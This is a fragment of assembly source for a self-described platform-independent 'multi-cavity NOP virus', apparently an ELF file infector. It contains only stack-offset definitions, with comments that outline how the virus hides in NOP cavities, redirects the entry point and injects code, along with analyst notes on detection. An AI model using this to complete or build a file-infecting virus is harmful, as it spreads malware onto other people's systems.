RECON06 . A PLATFORM INDEPENDENT MULTI-CAVITY NOP VIRUS
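# Named offsets for the listing's local variables (GAS syntax, `#` comments).
# Every value is negative, so these are presumably displacements from a frame
# base register set up outside this excerpt -- TODO confirm against the prologue.
#
# One directive per line: `#` opens a comment that runs to end of line, so
# several `.equ` directives sharing a line leave every symbol after the first
# comment undefined.

        .equ    last,             -0x58
        .equ    lastJA,           -0x5c     # the address of the operand of the last jump instruction
        .equ    vstart,           -0x60     # where the virus begins, and where the new e_entry should be
        .equ    new_e_entry,      -0x64     # 'new' as in new host
# Analyst note: e_entry is the ELF header entry-point field. The two slots
# above track its replacement value, so an entry point that differs from a
# known-good baseline is the header-level trace of this redirection.

        .equ    newjmp_loc,       -0x68     # for forward/backward jump calculations
        .equ    oldjmp_loc,       -0x6c
# NOTE(review): no symbol is defined for -0x70; jmp_dist may be 8 bytes wide
# or the slot may be unused -- not determinable from this excerpt.
        .equ    jmp_dist,         -0x74

        .equ    oldopcode_pos,    -0x78
        .equ    oldopcode,        -0x7c
        .equ    newopcode_pos,    -0x80
        .equ    newopcode,        -0x84

        .equ    oldsizes_parity,  -0x88
        .equ    oldsizes_pos,     -0x8c
        .equ    oldsizes_cur,     -0x90
        .equ    oldsizes,         -0x94
        .equ    newsizes_pos,     -0x98
        .equ    newsizes_parity,  -0x9c
        .equ    newsizes_cur,     -0xa0

# 0x100 bytes separate `name` from the slot above it (-0xa0); presumably a
# fixed-size name buffer -- verify against the code that fills it, since the
# bound on what is written there is not visible here.
        .equ    name,             -0x1a0

# From the old infected executable, we copy the instruction sizes
# to this allocation and later insert them into the new executable
# one by one, just like we inject virus code.
# 0x460 bytes separate `newsizes` from `name`; whether the copy is bounded by
# that span is not shown in this excerpt.
        .equ    newsizes,         -0x600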